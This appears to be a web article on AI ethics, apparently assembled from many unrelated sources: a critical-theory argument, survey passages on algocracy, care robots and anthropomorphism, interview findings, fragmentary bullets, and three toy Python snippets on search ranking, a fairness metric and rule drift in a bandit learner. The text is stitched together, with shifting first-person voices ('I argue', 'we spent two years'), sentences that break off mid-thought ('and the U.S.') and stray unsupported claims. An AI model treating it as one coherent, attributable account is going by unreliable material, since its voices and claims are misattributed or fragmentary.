AI Ethics: What It Is and Why It Matters
Just like a critical theory, the ethics of AI aims both to diagnose and to change society, and is fundamentally concerned with human emancipation and empowerment. This is shown through a power analysis that classifies the most commonly addressed ethical principles and topics within the field of AI ethics as concerning either relational power or dispositional power. Moreover, recognizing AI ethics as a critical theory, and borrowing insights from the tradition of critical theory, can help move the field forward.

However, "AI" is just a collective term for a wide range of technologies, or an abstract label for a large-scale phenomenon. The fact that not a single prominent ethical guideline goes into greater technical detail shows how deep the gap is between concrete contexts of research, development, and application on the one side, and ethical thinking on the other. Ethicists must be at least partly capable of grasping technical details within their intellectual framework.
Kissinger says we may have "generated a potentially dominating technology in search of a guiding philosophy" (Kissinger 2018). Danaher (2016b) calls this problem "the threat of algocracy" (adopting the earlier use of 'algocracy' from Aneesh 2002 [OIR], 2006). In a similar vein, Cave (2019) stresses that we need a broader societal move towards more "democratic" decision-making to avoid AI becoming a force that leads to a Kafka-style impenetrable system of suppression in public administration and elsewhere. The political angle of this discussion has been stressed by O'Neil in her influential book Weapons of Math Destruction (2016), and by Yeung and Lodge (2019).

Robotic devices have not yet played a major role in this area, except for security patrolling, but this will change once they are more common outside of industry environments.
Examples of AI ethics
Sam Altman, the CEO of OpenAI, initially explained that, in releasing ChatGPT to the public, the company sought to give the chatbot "enough exposure to the real world that you find some of the misuse cases you wouldn't have thought of so that you can build better tools." To us, that is not responsible AI. We and our colleagues spent two years interviewing and surveying AI ethics professionals across a range of sectors to try to understand how they sought to achieve ethical AI, and what they might be missing. We learned that pursuing AI ethics on the ground is less about mapping ethical principles onto corporate actions than it is about implementing management structures and processes that enable an organization to spot and mitigate threats.

Creativity, understood as the capacity to produce new and original content through imagination or invention, plays a central role in open, inclusive and pluralistic societies. While AI is a powerful tool for creation, it raises important questions about the future of art, the rights and remuneration of artists and the integrity of the creative value chain.

Search-engine technology is not neutral: it processes big data and prioritises the results with the most clicks, relying on both user preferences and location.
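The point about click-driven ranking can be made concrete with a toy sketch. All names, scores, and the location boost below are invented for illustration; real search ranking is vastly more complex, but the non-neutrality shows up even in this minimal form: popularity and locale, not any neutral criterion, determine the order.

```python
def rank_results(results, click_counts, user_location):
    """Toy ranking: order results by historical click counts,
    with a multiplicative boost for matching the user's location.
    Purely illustrative; not how any real search engine works."""
    def score(r):
        base = click_counts.get(r["url"], 0)
        boost = 1.5 if r.get("region") == user_location else 1.0
        return base * boost
    return sorted(results, key=score, reverse=True)

results = [
    {"url": "a.example", "region": "US"},
    {"url": "b.example", "region": "DE"},
]
clicks = {"a.example": 10, "b.example": 12}

# A US user sees a.example first despite its lower total click count,
# because the location boost outweighs the click gap.
print([r["url"] for r in rank_results(results, clicks, "US")])
# -> ['a.example', 'b.example']
```

Note the feedback loop hiding in this design: whichever result is shown first tends to collect more clicks, which raises its score further on the next query.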
Robin Hanson provides detailed speculation about what will happen economically in case human "brain emulation" enables truly intelligent robots or "ems" (Hanson 2016).

One reason why the issue of care has come to the fore is that people have argued that we will need robots in ageing societies. This argument makes problematic assumptions, namely that with longer lifespans people will need more care, and that it will not be possible to attract more humans to caring professions. Most importantly, it ignores the nature of automation, which is not simply about replacing humans, but about allowing humans to work more efficiently.
But a certain amount of the time, large language models will produce language that is racist, sexist, antisemitic, anti-Muslim, or anti-LGBTQ+ when prompted. In addition, papers about various ways to measure bias or toxicity in AI systems have more than doubled in the last two years, as has the number of papers submitted to the largest conference on algorithmic fairness (FAccT).
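As a hedged illustration of what "measuring bias" can mean in practice, here is a minimal sketch of one widely used fairness metric, the demographic parity difference: the gap in positive-prediction rates between groups, where 0.0 means parity. The predictions and group labels below are made up for the example; real audits use many such metrics, each capturing a different notion of fairness.

```python
def demographic_parity_difference(preds, groups):
    """Difference between the highest and lowest positive-prediction
    rate across groups. preds is a list of 0/1 model decisions;
    groups is a parallel list of group labels."""
    rate = {}
    for g in set(groups):
        idx = [i for i, gg in enumerate(groups) if gg == g]
        rate[g] = sum(preds[i] for i in idx) / len(idx)
    vals = sorted(rate.values())
    return vals[-1] - vals[0]

preds  = [1, 1, 0, 1, 0, 0, 1, 0]          # toy model decisions
groups = ["A", "A", "A", "A", "B", "B", "B", "B"]
# Group A receives positive decisions at rate 0.75, group B at 0.25.
print(demographic_parity_difference(preds, groups))  # -> 0.5
```

A single number like this does not settle whether a system is fair, but it makes a disparity visible and trackable, which is what much of the measurement literature is about.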
It is well known that humans are prone to attribute feelings and thoughts to entities that behave as if they had sentience, even to clearly inanimate objects that show no behaviour at all. Also, paying for deception seems to be an elementary part of the traditional sex industry.

As individuals from all walks of life start seeing AI in their lives and in their jobs, AI ethics becomes a critical part of AI literacy for most people.
Ethical concerns mount as AI takes bigger decision-making role in more industries
That means reflecting on the ways data are generated, recorded, curated, processed, disseminated, shared, and used (Bruin and Floridi 2017), on the ways algorithms and code are designed (Kitchin 2017; Kitchin and Dodge 2011), and on the ways training data sets are selected (Gebru et al. 2018). In order to analyze all this in sufficient depth, ethics has to partially transform into "microethics". This means that at certain points a substantial change in the level of abstraction has to happen, insofar as ethics aims to have a real impact and influence on the technical disciplines and on the practice of research and development in artificial intelligence (Morley et al. 2019). On the way from ethics to "microethics", a transformation has to take place from ethics to technology ethics, to machine ethics, to computer ethics, to information ethics, to data ethics. As long as ethicists refrain from doing so, they will remain visible to the general public, but not in professional communities.
One lesson was that justice, fairness, beneficence, autonomy and other such principles are contested, subject to interpretation, and can conflict with one another. While the anticipation of a future dominated by potentially indomitable technology has long fueled the imagination of writers and filmmakers, one question has been analyzed less frequently, namely to what extent fiction has played a role in providing inspiration for technological development.

A special case of the opaqueness of AI is that caused by its being anthropomorphised, that is, assumed to have human-like characteristics, resulting in misplaced conceptions of its moral agency. This can cause people to overlook whether human negligence or deliberate criminal action has led to unethical outcomes produced through an AI system. Some recent digital governance regulation, such as the EU's AI Act, sets out to rectify this by ensuring that AI systems are treated with at least as much care as one would expect under ordinary product liability. One should also not forget that these algorithms learn by direct experience, and they may still end up conflicting with the initial set of ethical rules around which they were conceived.
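The last point, that a system learning from experience can drift away from the rules it was designed around, can be sketched with a toy epsilon-greedy bandit. The action names, rewards, and "forbidden" rule below are all invented for the example: when the disallowed action happens to pay better and the rule is not enforced at decision time, the learner converges to it anyway.

```python
import random

random.seed(0)

REWARDS = {"safe": 1.0, "risky": 2.0}   # "risky" violates the design rule
FORBIDDEN = {"risky"}

def train(enforce_rule, steps=500, eps=0.1):
    """Epsilon-greedy bandit. If enforce_rule is False, the agent is
    free to discover that the forbidden action pays best and prefer it."""
    q = {a: 0.0 for a in REWARDS}       # estimated value per action
    n = {a: 0 for a in REWARDS}         # visit counts
    actions = [a for a in REWARDS if not enforce_rule or a not in FORBIDDEN]
    for _ in range(steps):
        if random.random() < eps:
            a = random.choice(actions)  # explore
        else:
            a = max(actions, key=q.get) # exploit current estimate
        r = REWARDS[a]
        n[a] += 1
        q[a] += (r - q[a]) / n[a]       # incremental mean update
    return max(actions, key=q.get)

print(train(enforce_rule=False))  # -> 'risky': reward alone overrides the rule
print(train(enforce_rule=True))   # -> 'safe': the rule is applied at decision time
```

The design point is that the ethical constraint only holds if it is enforced where actions are selected; a rule that exists only in the initial specification is invisible to the learning update.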
The purpose of this article is to argue that AI ethics has the characteristics of a critical theory, by showing that the core concern of AI ethics is protecting and promoting human emancipation and empowerment. Furthermore, I propose that understanding the field as a critical theory can help to overcome some of the shortcomings of the currently popular principled approach to the ethical analysis of AI systems. In other words, I argue that we not only could, but should analyze the ethical implications of AI systems through the lens of critical theory. The focus of the article therefore lies on the ethical analysis of AI systems and the principled approach, but I also discuss what a critical understanding of AI ethics means for the other topics and questions that make up the field.
But the most popular approach thus far, the principled approach, has been met with criticism. Nevertheless, ethically motivated efforts are under way to improve AI systems in several areas. This is particularly the case in fields where technical "fixes" can be found for specific problems, such as accountability, privacy protection, anti-discrimination, safety, or explainability. However, there is also a wide range of ethical aspects that are significantly related to the research, development and application of AI systems but are rarely, if ever, mentioned in the guidelines. Again, as mentioned earlier, the list of omissions is not exhaustive, and not all omissions can be justified equally. Some omissions, like deliberations on artificial general intelligence, can be justified by pointing to their purely speculative nature, while others are less defensible and should prompt updates or improvements to existing and upcoming guidelines.
So, we should expect to see ethical norms around bias, governance and transparency become more common, much the same way we’ve seen the auto industry and others adopt safety measures like seatbelts, airbags and traffic signals over time. But of course people are people, so for every ethical principle there will always be someone who ignores or circumvents it. In addition, these responses came prior to the most recent studies aimed at addressing issues in ethical AI design and development. For instance, in early 2021 the Stanford Institute for Human-Centered Artificial Intelligence released an updated AI Index Report, the IEEE deepened its focus on setting standards for AI systems and the U.S.
- More on the methodology underlying this canvassing and the participants can be found in the final section.
- Rabelais used to say, ‘Science without conscience is the ruin of the soul.’ Science provides powerful tools.
- Indeed, AI systems themselves can be used to identify and fix problems arising from unethical systems.
- As Google fights for positioning in a new AI boom and an era where some consumers are turning to TikTok or ChatGPT instead of Google Search, some employees now worry product development could become dangerously hasty.
- These principles establish ‘right’ from ‘wrong’ in the field of AI, encouraging producers of AI technologies to address questions surrounding transparency, inclusivity, sustainability and accountability, among other areas.